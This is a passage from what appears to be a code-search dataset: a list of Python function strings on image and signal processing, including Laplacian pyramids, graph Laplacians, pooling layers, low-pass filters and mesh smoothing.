range(len(guassianPyramid)-1):\n Gi = upsample(guassianPyramid[i+1])\n G = guassianPyramid[i]\n r, c = G.shape[:2]\n L = G - Gi[:r, :c]\n pyramid.append(L)\n\n pyramid.append(guassianPyramid[-1])\n return pyramid", "def apply_1d_filter(bfilter, timage):\n image_length = len(timage)\n ovrlay = int(bfilter.shape[0] / 2)\n tmp_array = np.zeros(image_length + 2 * ovrlay)\n tmp_array[ovrlay:-ovrlay] = timage\n res_array = np.zeros(image_length )\n for i in np.arange(image_length) + ovrlay:\n local_matrix = tmp_array[i - ovrlay:i + ovrlay + 1]\n res_array[i - ovrlay] = sum(local_matrix * bfilter)\n return res_array", "def laplacian_texture_smoothing(mesh, tex, nb_iter, dt):\n print(\" Smoothing texture\")\n lap, lap_b = compute_mesh_laplacian(mesh, lap_type=\"fem\")\n return laplacian_smoothing(tex, lap, lap_b, nb_iter, dt)", "def rescale_laplacian(L, lmax=None):\r\n if lmax is None:\r\n try:\r\n if sp.issparse(L):\r\n lmax = sp.linalg.eigsh(L, 1, which=\"LM\", return_eigenvectors=False)[0]\r\n else:\r\n n = L.shape[-1]\r\n lmax = linalg.eigh(L, eigvals_only=True, eigvals=[n - 2, n - 1])[-1]\r\n except ArpackNoConvergence:\r\n lmax = 2\r\n if sp.issparse(L):\r\n I = sp.eye(L.shape[-1], dtype=L.dtype)\r\n else:\r\n I = np.eye(L.shape[-1], dtype=L.dtype)\r\n L_scaled = (2.0 / lmax) * L - I\r\n return L_scaled", "def laplaceianExpand(lap_pyr: List[np.ndarray]) -> np.ndarray:\r\n gaker = cv2.getGaussianKernel(5, -1)\r\n upsmaple_kernel = gaker @ gaker.transpose()\r\n upsmaple_kernel *= 4\r\n lap_pyr.reverse()\r\n r_img = [lap_pyr[0]]\r\n for i in range(1, len(lap_pyr)):\r\n temp = gaussExpand(r_img[i - 1], upsmaple_kernel)\r\n if lap_pyr[i].shape != temp.shape:\r\n x = temp.shape[0] - lap_pyr[i].shape[0]\r\n y = temp.shape[1] - lap_pyr[i].shape[1]\r\n new_img = temp[x::, y::] + lap_pyr[i]\r\n else:\r\n new_img = temp + lap_pyr[i]\r\n r_img.append(new_img)\r\n lap_pyr.reverse()\r\n r_img.reverse()\r\n return r_img[0]", "def laplacian(G,nodelist=None,weight='weight'):\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\n \"laplacian() requires numpy: http://scipy.org/ \")\n # this isn't the most efficient way to do this...\n if G.is_multigraph():\n A=np.asarray(nx.to_numpy_matrix(G,nodelist=nodelist,weight=weight))\n I=np.identity(A.shape[0])\n D=I*np.sum(A,axis=1)\n L=D-A\n return L\n # Graph or DiGraph, this is faster than above \n if nodelist is None:\n nodelist=G.nodes()\n n=len(nodelist)\n index=dict( (n,i) for i,n in enumerate(nodelist) )\n L = np.zeros((n,n))\n for ui,u in enumerate(nodelist):\n totalwt=0.0\n for v,d in G[u].items():\n try:\n vi=index[v]\n except KeyError:\n continue\n wt=d.get(weight,1)\n L[ui,vi]= -wt\n totalwt+=wt\n L[ui,ui]= totalwt\n return L", "def laplacian2(A, laplacian_type='raw'):\r\n\r\n N = A.shape[0]\r\n # TODO: Raise exception if A is not square\r\n\r\n degrees = A.sum(1)\r\n # To deal with loops, must extract diagonal part of A\r\n diagw = np.diag(A)\r\n\r\n # w will consist of non-diagonal entries only\r\n ni2, nj2 = A.nonzero()\r\n w2 = A[ni2, nj2]\r\n ndind = (ni2 != nj2).nonzero() # Non-diagonal indices\r\n ni = ni2[ndind]\r\n nj = nj2[ndind]\r\n w = w2[ndind]\r\n\r\n di = np.arange(N) # diagonal indices\r\n\r\n if laplacian_type == 'raw':\r\n # non-normalized laplaciand L = D - A\r\n L = np.diag(degrees - diagw)\r\n L[ni, nj] = -w\r\n L = lil_matrix(L)\r\n elif laplacian_type == 'normalized':\r\n # TODO: Implement the normalized laplacian case\r\n # % normalized laplacian D^(-1/2)*(D-A)*D^(-1/2)\r\n # % diagonal entries\r\n # dL=(1-diagw./degrees); % will produce NaN for degrees==0 locations\r\n # dL(degrees==0)=0;% which will be fixed here\r\n # % nondiagonal entries\r\n # ndL=-w./vec( sqrt(degrees(ni).*degrees(nj)) );\r\n # L=sparse([ni;di],[nj;di],[ndL;dL],N,N);\r\n print(\"Not implemented\")\r\n else:\r\n # TODO: Raise an exception\r\n print(\"Don't know what to do\")\r\n\r\n return L", "def laplacian(ndim, shape, is_real=True):\n impr = np.zeros([3] * ndim)\n for dim in range(ndim):\n idx = tuple([slice(1, 2)] * dim +\n [slice(None)] +\n [slice(1, 2)] * (ndim - dim - 1))\n impr[idx] = np.array([-1.0,\n 0.0,\n -1.0]).reshape([-1 if i == dim else 1\n for i in range(ndim)])\n impr[([slice(1, 2)] * ndim)] = 2.0 * ndim\n return ir2tf(impr, shape, is_real=is_real), impr", "def pool_forward(A_prev, kernel_shape, stride=(1, 1), mode='max'):\n\n m = A_prev.shape[0]\n image_h = A_prev.shape[1]\n image_w = A_prev.shape[2]\n nc = A_prev.shape[3]\n filter_h = kernel_shape[0]\n filter_w = kernel_shape[1]\n s1 = stride[0]\n s2 = stride[1]\n n_dim1 = int((image_h - filter_h) / stride[0]) + 1\n n_dim2 = int((image_w - filter_w) / stride[1]) + 1\n pool = np.zeros((m, n_dim1, n_dim2, nc))\n new_images = A_prev.copy()\n\n for x in range(n_dim1):\n for y in range(n_dim2):\n mini_matrix = new_images[:, x * s1: x * s1 + filter_h,\n y * s2: y * s2 + filter_w, :]\n if mode == 'max':\n values = np.max(mini_matrix, axis=(1, 2))\n else:\n values = np.average(mini_matrix, axis=(1, 2))\n pool[:, x, y, :] = values\n return pool", "def lfilter(b, a, x, axis=-1, zi=None):\n a = np.atleast_1d(a)\n if len(a) == 1:\n # This path only supports types fdgFDGO to mirror _linear_filter below.\n # Any of b, a, x, or zi can set the dtype, but there is no default\n # casting of other types; instead a NotImplementedError is raised.\n b = np.asarray(b)\n a = np.asarray(a)\n if b.ndim != 1 and a.ndim != 1:\n raise ValueError('object of too small depth for desired array')\n x = np.asarray(x)\n inputs = [b, a, x]\n if zi is not None:\n # _linear_filter does not broadcast zi, but does do expansion of\n # singleton dims.\n zi = np.asarray(zi)\n if zi.ndim != x.ndim:\n raise ValueError('object of too small depth for desired array')\n expected_shape = list(x.shape)\n expected_shape[axis] = b.shape[0] - 1\n expected_shape = tuple(expected_shape)\n # check the trivial case where zi is the right shape first\n if zi.shape != expected_shape:\n strides = zi.ndim * [None]\n if axis < 0:\n axis += zi.ndim\n for k in range(zi.ndim):\n if k == axis and zi.shape[k] == expected_shape[k]:\n strides[k] = zi.strides[k]\n elif k != axis and zi.shape[k] == expected_shape[k]:\n strides[k] = zi.strides[k]\n elif k != axis and zi.shape[k] == 1:\n strides[k] = 0\n else:\n raise ValueError('Unexpected shape for zi: expected '\n '%s, found %s.' %\n (expected_shape, zi.shape))\n zi = np.lib.stride_tricks.as_strided(zi, expected_shape,\n strides)\n inputs.append(zi)\n dtype = np.result_type(*inputs)\n\n if dtype.char not in 'fdgFDGO':\n raise NotImplementedError(\"input type '%s' not supported\" % dtype)\n\n b = np.array(b, dtype=dtype)\n a = np.array(a, dtype=dtype, copy=False)\n b /= a[0]\n x = np.array(x, dtype=dtype, copy=False)\n\n out_full = np.apply_along_axis(lambda y: np.convolve(b, y), axis, x)\n ind = out_full.ndim * [slice(None)]\n if zi is not None:\n ind[axis] = slice(zi.shape[axis])\n out_full[ind] += zi\n\n ind[axis] = slice(out_full.shape[axis] - len(b) + 1)\n out = out_full[ind]\n\n if zi is None:\n return out\n else:\n ind[axis] = slice(out_full.shape[axis] - len(b) + 1, None)\n zf = out_full[ind]\n return out, zf\n else:\n if zi is None:\n return sigtools._linear_filter(b, a, x, axis)\n else:\n return sigtools._linear_filter(b, a, x, axis, zi)", "def lowPassFilter(img, window=30):\n gray = grayscale(img)\n\tdft = cv2.dft(np.float32(gray), flags = cv2.DFT_COMPLEX_OUTPUT)\n\tdft_shift = np.fft.fftshift(dft)\n\trows, cols = gray.shape\n\tcrow, ccol = rows/2, cols/2\n\tmask = np.zeros((rows, cols, 2), np.uint8)\n\tmask[crow-window:crow+window, ccol-window:ccol+window] = 1\n\tfshift = dft_shift*mask\n\tf_ishift = np.fft.ifftshift(fshift)\n\timg_back = cv2.idft(f_ishift)\n\timg_back = cv2.magnitude(img_back[:,:,0], img_back[:,:,1])\n\treturn img_back", "def laplacian_mesh_smoothing(mesh, nb_iter, dt, volume_preservation=False):\n print(\" Smoothing mesh\")\n lap, lap_b = compute_mesh_laplacian(mesh, lap_type=\"fem\")\n smoothed_vert = laplacian_smoothing(mesh.vertices, lap, lap_b, nb_iter, dt)\n if volume_preservation:\n vol_ini = mesh.volume\n vol_new = trimesh.triangles.mass_properties(\n smoothed_vert[mesh.faces], skip_inertia=True\n )[\"volume\"]\n # scale by volume ratio\n smoothed_vert *= (vol_ini / vol_new) ** (1.0 / 3.0)\n return trimesh.Trimesh(\n faces=mesh.faces, vertices=smoothed_vert, metadata=mesh.metadata, process=False\n )", "def laplacian_tf(P, Q):\r\n\r\n # Create transfer function H.\r\n H = np.zeros((P, Q), dtype=np.complex128)\r\n # Create laplacian transfer function.\r\n laplacian = np.array([[0, -1, 0], \r\n [-1, 4, -1], \r\n [0, -1, 0]], dtype=np.int64)\r\n # Center laplacian kernel on P x Q rectangle.\r\n H[int(np.floor(P/2))-1: int(np.floor(P/2))+2, int(np.floor(Q/2))-1: int(np.floor(Q/2))+2] = laplacian\r\n # Calculate laplacian transfer function.\r\n H = np.fft.fftshift(np.fft.fft2(H))\r\n return H", "def smooth_pinv(B, L):\n L = diag(L)\n inv = pinv(concatenate((B, L)))\n return inv[:, :len(B)]", "def PrewittGradient(anImage):\n XKernel = [\n [-1,0,1],\n [-1,0,1],\n [-1,0,1]\n ]\n YKernel = [\n [-1,-1,-1],\n [0,0,0],\n [1,1,1]\n ]\n return ApplyGradientKernels(anImage, XKernel, YKernel)", "def laplacian(images, n_down=4):\n lapls = []\n\n for i in range(n_down):\n n = F.interpolate(images, scale_factor=0.5, mode='bilinear',\n align_corners=True)\n lapls.append(images -\n F.interpolate(n, size=images.shape[-2:], mode='bilinear',\n align_corners=True))\n images = n\n\n lapls.append(images)\n return lapls", "def make_vector_laplace(bcs: Boundaries) -> OperatorType:\n assert isinstance(bcs.grid, CylindricalSymGrid)\n bcs.check_value_rank(1)\n\n laplace_r = make_laplace(bcs.extract_component(0))\n laplace_z = make_laplace(bcs.extract_component(1))\n laplace_phi = make_laplace(bcs.extract_component(2))\n\n @jit_allocate_out(out_shape=(3,) + bcs.grid.shape)\n def vector_laplace(arr, out=None):\n \"\"\"apply gradient operator to array `arr`\"\"\"\n laplace_r(arr[0], out=out[0])\n laplace_z(arr[1], out=out[1])\n laplace_phi(arr[2], out=out[2])\n return out\n\n return vector_laplace # type: ignore", "def solve_laplace_equation(\n grid: GridBase, bc: \"BoundariesData\", label: str = \"Solution to Laplace's equation\"\n) -> ScalarField:\n rhs = ScalarField(grid, data=0)\n return solve_poisson_equation(rhs, bc=bc, label=label)", "def pool_forward(A_prev, kernel_shape, stride=(1, 1), mode='max'):\n sh, sw = stride\n kh, kw = kernel_shape\n m, h_prev, w_prev, c_prev = A_prev.shape\n if mode == 'max':\n pool = np.max\n else:\n pool = np.average\n pixy = (((h_prev - kh) // sh) + 1)\n pixx = (((w_prev - kw) // sw) + 1)\n cvv_img = np.zeros((m, pixy, pixx, c_prev))\n for i in range(pixy):\n for j in range(pixx):\n cvv_img[:, i, j, :] = pool(A_prev[:, (i * sh): (i * sh) + kh,\n (j * sw): (j * sw) + kw],\n axis=(1, 2))\n return cvv_img", "def pooling_layer(self, img):\n img_w, img_h, img_c = img.shape\n output_dim = int((img_w - self._kernel_size) / self._kernel_size) + 1\n output = np.zeros((output_dim, output_dim, img_c))\n\n for c in range(img_c):\n in_x = out_x = 0\n while in_x + self._kernel_size <= img_w:\n in_y = out_y = 0\n while in_y + self._kernel_size <= img_h:\n output[out_x, out_y, c] = np.max(img[in_x:in_x + self._kernel_size, in_y:in_y + self._kernel_size, c])\n in_y += self._kernel_size\n out_y += 1\n in_x += self._kernel_size\n out_x += 1\n return output", "def normalized_laplacian(degree_vector, weight_matrix, length):\n holders = np.zeros((length, 1))\n holders[:, 0] = 1 / degree_vector\n\n return np.eye(length) - holders * weight_matrix", "def l_conv(self, filters, l_in, dropout=None):\n l = tf.keras.layers.Conv2D(filters, 3, activation='relu', padding='same', kernel_initializer='he_normal')(l_in)\n l = tf.keras.layers.Conv2D(filters, 3, activation='relu', padding='same', kernel_initializer='he_normal')(l)\n if dropout:\n l = tf.keras.layers.Dropout(dropout)(l)\n return l, tf.keras.layers.MaxPool2D(pool_size=self.pooling_size)(l)", "def lowpass(data,filterSize=None):\n\n def convolve(signal,kernel):\n pad=np.ones(len(kernel)/2)\n signal=np.concatenate((pad*signal[0],signal,pad*signal[-1]))\n signal=np.convolve(signal,kernel,mode='same')\n signal=signal[len(pad):-len(pad)]\n return signal\n\n def kernel_gaussian(size=100, sigma=None, forwardOnly=False):\n if sigma is None:\n sigma=size/10\n size=int(size)\n points=np.exp(-np.power(np.arange(size)-size/2,2)/(2*np.power(sigma,2)))\n if forwardOnly:\n points[:int(len(points)/2)]=0\n return points/sum(points)\n\n if filterSize is None:\n filterSize=len(data)/10\n kernel=kernel_gaussian(size=filterSize)\n data=convolve(data,kernel) # do the convolution with padded edges\n return data", "def solve_inverse_laplacian(self, array_in, zero_mode_val):\r\n # Initialise output array, u\r\n array_out = np.zeros((self.N, self.N), dtype = complex)\r\n N = self.N\r\n\r\n for k1 in range(-N//2, N//2):\r\n for k2 in range(-N//2, N//2):\r\n if k1 == k2 and k1 == 0: # Set zero-th mode, i.e. constant of integration\r\n array_out[k1 + N//2, k2 + N//2] = zero_mode_val\r\n else: # All other modes are found by inverting the spectral differentiation factor\r\n laplace_op = -(k1**2 + k2**2)*self.factor**2\r\n array_out[k1 + N//2, k2 + N//2] = array_in[k1 + N//2, k2 + N//2]/laplace_op\r\n\r\n return array_out", "def calculate_laplace_coeff(alpha, j, s):\n return integrate.quad(lambda psi, alpha, j, s: np.cos(j*psi)/(1-2*alpha*np.cos(psi)+alpha**2)**s,\n 0, 2*np.pi, args=(alpha, j, s,))[0]/np.pi", "def forward(self, query, key, value, mask):\n # linear -> GLU -> lightconv -> linear\n x = query\n B, T, C = x.size()\n H = self.wshare\n\n # first liner layer\n x = self.linear1(x)\n\n # GLU activation\n x = self.act(x)\n\n # convolution along frequency axis\n weight_f = F.softmax(self.weight_f, dim=-1)\n weight_f = F.dropout(weight_f, self.dropout_rate, training=self.training)\n weight_new = torch.zeros(\n B * T, 1, self.kernel_size, device=x.device, dtype=x.dtype\n ).copy_(weight_f)\n xf = F.conv1d(\n x.view(1, B * T, C), weight_new, padding=self.padding_size, groups=B * T\n ).view(B, T, C)\n\n # lightconv\n x = x.transpose(1, 2).contiguous().view(-1, H, T) # B x C x T\n weight = F.dropout(self.weight, self.dropout_rate, training=self.training)\n if self.use_kernel_mask:\n self.kernel_mask = self.kernel_mask.to(x.device)\n weight = weight.masked_fill(self.kernel_mask == 0.0, float(\"-inf\"))\n weight = F.softmax(weight, dim=-1)\n x = F.conv1d(x, weight, padding=self.padding_size, groups=self.wshare).view(\n B, C, T\n )\n if self.use_bias:\n x = x + self.bias.view(1, -1, 1)\n x = x.transpose(1, 2) # B x T x C\n x = torch.cat((x, xf), -1) # B x T x Cx2\n\n if mask is not None and not self.use_kernel_mask:\n mask = mask.transpose(-1, -2)\n x = x.masked_fill(mask == 0, 0.0)\n\n # second linear layer\n x = self.linear2(x)\n return x", "def lanczos_resampling(arr, target_r, target_c):\n origin_r = arr.shape[0]\n origin_c = arr.shape[1]\n s_r, s_c = get_sampling_scale(origin_r, origin_c, target_r, target_c)\n # Padding 3 to outside of arr.\n arr_padded = np.pad(arr, ((2, 3), (2, 3), (0, 0)), 'edge')\n output = np.ndarray([target_r, target_c, 3], dtype=np.uint8)\n\n def lanczos_filter(x):\n if x == 0:\n return 1\n elif -3 <= x < 3:\n return (3 * np.sin(np.pi * x) * np.sin(np.pi * x / 3)) / (np.pi * np.pi * x * x)\n else:\n return 0\n\n # Populate pixel in output\n for r in range(target_r):\n for c in range(target_c):\n rf, cf = s_r * r, s_c * c\n rp, cp = math.floor(rf), math.floor(cf)\n # Grab 36 pixels.\n region = arr_padded[rp:(rp + 6), cp:(cp + 6), :]\n coefs = np.ndarray((6, 6), dtype=float)\n for r_t in range(-2, 4):\n for c_t in range(-2, 4):\n coefs[r_t + 2, c_t + 2] = lanczos_filter(np.sqrt((rp + r_t - rf) ** 2 + (cp + c_t - cf) ** 2))\n coefs /= np.sum(coefs)\n this_color = np.zeros((3, ), dtype=float)\n for r_t in range(6):\n for c_t in range(6):\n this_color += region[r_t, c_t, :] * coefs[r_t, c_t]\n this_color = np.minimum(np.maximum(this_color, 0), 255)\n output[r, c, :] = this_color\n print(\"\\rPlease Wait: %d / %d\" % (r, target_r), end='')\n return output", "def low_pass(self, x, kernel):\n\n ############################\n ### TODO: YOUR CODE HERE ###\n\n # HANDLE NON-SQUARE KERNELS!!!\n padX = kernel.shape[2]//2\n padY = kernel.shape[3]//2\n filtered_image = F.conv2d(x, kernel, padding=(padX, padY), groups=self.n_channels)\n\n # raise NotImplementedError('`low_pass` function in `models.py` needs to '\n # + 'be implemented')\n\n ### END OF STUDENT CODE ####\n ############################\n\n return filtered_image", "def laplacian(W, normalized=False):\r\n # Degree matrix.\r\n d = W.sum(axis=0)\r\n # Laplacian matrix.\r\n if not normalized:\r\n D = scipy.sparse.diags(d.A.squeeze(), 0)\r\n L = D - W\r\n else:\r\n # d += np.spacing(np.array(0, W.dtype))\r\n d = 1 / np.sqrt(d)\r\n D = scipy.sparse.diags(d.A.squeeze(), 0)\r\n I = scipy.sparse.identity(d.size, dtype=W.dtype)\r\n L = I - D * W * D\r\n\r\n # assert np.abs(L - L.T).mean() < 1e-9\r\n assert type(L) is scipy.sparse.csr.csr_matrix\r\n return L", "def laplacian_(self, grid, i, j):\n l1 = grid[(i+1+self.N) % self.N][j] + grid[(i-1+self.N) % self.N][j]\n l2 = grid[i][(j+1+self.N) % self.N] + grid[i][(j-1+self.N) % self.N]\n l3 = -4*grid[i][j]\n return (l1 + l2 + l3)/self.dx**2", "def _reduce_rows(im, filter_vec):\n im_small = convolve(im, filter_vec)\n return im_small[::SIZE_F]", "def warp_tensor(tensor):\n\n #tf.config.run_functions_eagerly(True)\n\n num_hole_rate = 4 / (128*128) # percent of selected pixels in downsample imagee\n\n tensor = tf.expand_dims(tensor, 0)\n if tensor.shape.rank == 5:\n # 3D blurring\n filters = tf.ones([3,3,3], dtype=tf.float32) / 27\n filters = filters[..., tf.newaxis, tf.newaxis]\n tensor = tf.nn.conv3d(tensor, filters, [1,1,1,1,1], \"SAME\")\n\n # make hole\n uniform_random = tf.random.uniform([tensor.shape[1]*tensor.shape[2]*tensor.shape[3]], 0, 1.0)\n uniform_random = tf.reshape(uniform_random, tensor.shape)\n mask_matrix = tf.where(uniform_random < num_hole_rate, tf.ones_like(tensor), tf.zeros_like(tensor)) \n \n # dilate holes \n filters = tf.ones([4,4,4], dtype=tf.float32) \n filters = filters[..., tf.newaxis, tf.newaxis]\n mask_matrix = tf.nn.conv3d(mask_matrix, filters, [1,1,1,1,1], \"SAME\")\n \n # apply mask -- make the \"holes\" the mean value of the image \n mean = tf.math.reduce_mean(tensor)\n tensor = tf.where(mask_matrix > 0, tf.ones_like(tensor)*mean, tensor) \n else:\n # 2D blurring\n filters = tf.ones([3,3], dtype=tf.float32) / 9\n filters = filters[..., tf.newaxis, tf.newaxis]\n tensor = tf.nn.conv2d(tensor, filters, [1,1,1,1], \"SAME\")\n\n # make hole\n uniform_random = tf.random.uniform([tensor.shape[1]*tensor.shape[2]], 0, 1.0)\n uniform_random = tf.reshape(uniform_random, tensor.shape)\n mask_matrix = tf.where(uniform_random < num_hole_rate, tf.ones_like(tensor), tf.zeros_like(tensor)) \n \n # dilate holes \n filters = tf.ones([4,4], dtype=tf.float32) \n filters = filters[..., tf.newaxis, tf.newaxis]\n mask_matrix = tf.nn.conv2d(mask_matrix, filters, [1,1,1,1], \"SAME\")\n \n # apply mask -- make the \"holes\" the mean value of the image \n mean = tf.math.reduce_mean(tensor)\n tensor = tf.where(mask_matrix > 0, tf.ones_like(tensor)*mean, tensor) \n\n\n return tf.squeeze(tensor, [0])", "def one_dim_sparse_laplacian(m: int):\n return sp.diags([1.0, -2.0, 1.0], [-1, 0, 1], dtype='float64', shape=(m, m), format='lil')", "def inject_latent(self, layer, inputs, target, action):\n hparams = self.hparams\n final_filters = common_layers.shape_list(layer)[-1]\n filters = hparams.hidden_size\n kernel = (4, 4)\n layer_shape = common_layers.shape_list(layer)\n activation_fn = common_layers.belu\n if hparams.activation_fn == \"relu\":\n activation_fn = tf.nn.relu\n\n def add_bits(layer, bits):\n z_mul = tfl.dense(bits, final_filters, name=\"unbottleneck_mul\")\n if not hparams.complex_addn:\n return layer + z_mul\n layer *= tf.nn.sigmoid(z_mul)\n z_add = tfl.dense(bits, final_filters, name=\"unbottleneck_add\")\n layer += z_add\n return layer\n\n if not self.is_training:\n if hparams.full_latent_tower:\n rand = tf.random_uniform(layer_shape[:-1] + [hparams.bottleneck_bits])\n bits = 2.0 * tf.to_float(tf.less(0.5, rand)) - 1.0\n else:\n bits, _ = discretization.predict_bits_with_lstm(\n layer, hparams.latent_predictor_state_size, hparams.bottleneck_bits,\n temperature=hparams.latent_predictor_temperature)\n bits = tf.expand_dims(tf.expand_dims(bits, axis=1), axis=2)\n return add_bits(layer, bits), 0.0\n\n # Embed.\n frames = tf.concat(inputs + [target], axis=-1)\n x = tfl.dense(\n frames, filters, name=\"latent_embed\",\n bias_initializer=tf.random_normal_initializer(stddev=0.01))\n x = common_attention.add_timing_signal_nd(x)\n\n # Add embedded action if present.\n if action is not None:\n x = common_video.inject_additional_input(\n x, action, \"action_enc_latent\", hparams.action_injection)\n\n if hparams.full_latent_tower:\n for i in range(hparams.num_compress_steps):\n with tf.variable_scope(\"latent_downstride%d\" % i):\n x = common_layers.make_even_size(x)\n if i < hparams.filter_double_steps:\n filters *= 2\n x = common_attention.add_timing_signal_nd(x)\n x = tfl.conv2d(x, filters, kernel,\n activation=activation_fn,\n strides=(2, 2), padding=\"SAME\")\n x = common_layers.layer_norm(x)\n else:\n x = common_layers.double_discriminator(x)\n x = tf.expand_dims(tf.expand_dims(x, axis=1), axis=1)\n\n bits, bits_clean = discretization.tanh_discrete_bottleneck(\n x, hparams.bottleneck_bits, hparams.bottleneck_noise,\n hparams.discretize_warmup_steps, hparams.mode)\n if not hparams.full_latent_tower:\n _, pred_loss = discretization.predict_bits_with_lstm(\n layer, hparams.latent_predictor_state_size, hparams.bottleneck_bits,\n target_bits=bits_clean)\n # Mix bits from latent with predicted bits on forward pass as a noise.\n if hparams.latent_rnn_max_sampling > 0.0:\n with tf.variable_scope(tf.get_variable_scope(), reuse=True):\n bits_pred, _ = discretization.predict_bits_with_lstm(\n layer, hparams.latent_predictor_state_size,\n hparams.bottleneck_bits,\n temperature=hparams.latent_predictor_temperature)\n bits_pred = tf.expand_dims(tf.expand_dims(bits_pred, axis=1), axis=2)\n # Be bits_pred on the forward pass but bits on the backward one.\n bits_pred = bits_clean + tf.stop_gradient(bits_pred - bits_clean)\n # Select which bits to take from pred sampling with bit_p probability.\n which_bit = tf.random_uniform(common_layers.shape_list(bits))\n bit_p = common_layers.inverse_lin_decay(hparams.latent_rnn_warmup_steps)\n bit_p *= hparams.latent_rnn_max_sampling\n bits = tf.where(which_bit < bit_p, bits_pred, bits)\n\n res = add_bits(layer, bits)\n # During training, sometimes skip the latent to help action-conditioning.\n res_p = common_layers.inverse_lin_decay(hparams.latent_rnn_warmup_steps / 2)\n res_p *= hparams.latent_use_max_probability\n res_rand = tf.random_uniform([layer_shape[0]])\n res = tf.where(res_rand < res_p, res, layer)\n return res, pred_loss", "def __call__(\n self,\n image: np.ndarray,\n f_keep_pixels: float = 0,\n f_keep_colored_pixels: float = 0,\n ) -> np.ndarray:\n # Store shape\n h, w, c = image.shape\n\n img_np = image\n\n # Apply transformations\n image: torch.Tensor = self.transform(Image.fromarray(image))\n image = image.to(self.device)\n\n # Copy the numpy array because it's not writeable otherwise\n # Bring into shape [1,1,h,w]\n image.unsqueeze_(0)\n\n # Inference\n result = self.model.networks.g_b_to_a.forward(image).detach()\n\n # From [-1,1] to [0,256]\n result = tensor2im(result, to_rgb=False)\n\n # Resize to the size the input image has\n result = cv2.resize(result, dsize=(w, h), interpolation=cv2.INTER_LINEAR)\n\n if f_keep_pixels > 0:\n grey_img = cv2.cvtColor(img_np, cv2.COLOR_BGR2GRAY)\n colored_pxls = f_keep_pixels * np.ones((h, w))\n\n result = (1 - f_keep_pixels) * result + f_keep_pixels * grey_img\n\n if f_keep_colored_pixels > 0:\n grey_img = cv2.cvtColor(img_np, cv2.COLOR_BGR2GRAY)\n colored_pxls = f_keep_colored_pixels * np.ones((h, w))\n colored_pxls[img_np[:, :, 0] == img_np[:, :, 1]] = 0\n\n result = (\n np.ones_like(colored_pxls) - colored_pxls\n ) * result + colored_pxls * grey_img\n\n return result.astype(np.uint8)", "def construct_2d_filt(lo: torch.Tensor, hi: torch.Tensor) -> torch.Tensor:\n ll = _outer(lo, lo)\n lh = _outer(hi, lo)\n hl = _outer(lo, hi)\n hh = _outer(hi, hi)\n filt = torch.stack([ll, lh, hl, hh], 0)\n filt = filt.unsqueeze(1)\n return filt", "def laplacian(self, point):\n n_vertices, n_faces = point.shape[-2], self.faces.shape[0]\n vertex_0, vertex_1, vertex_2 = self._vertices(point)\n len_edge_12 = gs.linalg.norm((vertex_1 - vertex_2), axis=-1)\n len_edge_02 = gs.linalg.norm((vertex_0 - vertex_2), axis=-1)\n len_edge_01 = gs.linalg.norm((vertex_0 - vertex_1), axis=-1)\n\n half_perimeter = 0.5 * (len_edge_12 + len_edge_02 + len_edge_01)\n area = gs.sqrt(\n (\n half_perimeter\n * (half_perimeter - len_edge_12)\n * (half_perimeter - len_edge_02)\n * (half_perimeter - len_edge_01)\n ).clip(min=1e-6)\n )\n sq_len_edge_12, sq_len_edge_02, sq_len_edge_01 = (\n len_edge_12 * len_edge_12,\n len_edge_02 * len_edge_02,\n len_edge_01 * len_edge_01,\n )\n cot_12 = (sq_len_edge_02 + sq_len_edge_01 - sq_len_edge_12) / area\n cot_02 = (sq_len_edge_12 + sq_len_edge_01 - sq_len_edge_02) / area\n cot_01 = (sq_len_edge_12 + sq_len_edge_02 - sq_len_edge_01) / area\n cot = gs.stack([cot_12, cot_02, cot_01], axis=1)\n cot /= 2.0\n id_vertices_120 = self.faces[:, [1, 2, 0]]\n id_vertices_201 = self.faces[:, [2, 0, 1]]\n id_vertices = gs.reshape(\n gs.stack([id_vertices_120, id_vertices_201], axis=0), (2, n_faces * 3)\n )\n\n def _laplacian(tangent_vec):\n \"\"\"Evaluate the mesh Laplacian operator.\n\n The operator is evaluated at a tangent vector at point to the\n manifold of DiscreteSurfaces. In other words, the operator is\n evaluated at a vector field defined on the surface point.\n\n Parameters\n ----------\n tangent_vec : array-like, shape=[..., n_vertices, 3]\n Tangent vector to the manifold at the base point that is the\n triangulated surface. This tangent vector is a vector field\n on the triangulated surface.\n\n Returns\n -------\n laplacian_at_tangent_vec: array-like, shape=[..., n_vertices, 3]\n Mesh Laplacian operator of the triangulated surface applied\n to one its tangent vector tangent_vec.\n \"\"\"\n to_squeeze = False\n if tangent_vec.ndim == 2:\n tangent_vec = gs.expand_dims(tangent_vec, axis=0)\n to_squeeze = True\n n_tangent_vecs = len(tangent_vec)\n tangent_vec_diff = (\n tangent_vec[:, id_vertices[0]] - tangent_vec[:, id_vertices[1]]\n )\n values = gs.einsum(\n \"bd,nbd->nbd\", gs.stack([gs.flatten(cot)] * 3, axis=1), tangent_vec_diff\n )\n\n laplacian_at_tangent_vec = gs.zeros((n_tangent_vecs, n_vertices, 3))\n\n id_vertices_201_repeated = gs.tile(id_vertices[1, :], (n_tangent_vecs, 1))\n\n for i_dim in range(3):\n laplacian_at_tangent_vec[:, :, i_dim] = gs.scatter_add(\n input=laplacian_at_tangent_vec[:, :, i_dim],\n dim=1,\n index=id_vertices_201_repeated,\n src=values[:, :, i_dim],\n )\n return (\n gs.squeeze(laplacian_at_tangent_vec, axis=0)\n if to_squeeze\n else laplacian_at_tangent_vec\n )\n\n return _laplacian", "def collate_fn(batch):\r\n transposed = zip(*batch)\r\n lbd = lambda batch:torch.cat([torch.from_numpy(b).long() for b in batch])\r\n return [lbd(samples) for samples in transposed]", "def apply3filter(array, filter_):\n s = int(len(filter_)/2)\n width = len(array[0])\n height = len(array)\n new_array = np.array(np.zeros((height,width)))\n for row in range(s, (height-s)):\n for col in range(s, (width-s)):\n new_array[row,col] = np.sum(filter_ * array[(row-s):(row+s+1),(col-s):(col+s+1)])\n return new_array", "def LconvBlock(self, name, kernel_size, is_causal,\n convolution_fn):\n return self._Seq(\n name,\n self.LConv(\n name='lconv',\n kernel_size=kernel_size,\n is_causal=is_causal,\n convolution_fn=convolution_fn),\n self.Feedforward('ff', is_causal))", "def pool_backward(dA, A_prev, kernel_shape, stride=(1, 1), mode='max'):\n sh, sw = stride\n kh, kw = kernel_shape\n m, h_prev, w_prev, c_prev = A_prev.shape\n dm, h_new, w_new, c_new = dA.shape\n dA_prev = np.zeros(A_prev.shape)\n for i in range(m):\n for j in range(h_new):\n for k in range(w_new):\n jsh = j * sh\n ksw = k * sw\n for ll in range(c_new):\n pool = A_prev[i, jsh: jsh + kh, ksw: ksw + kw, 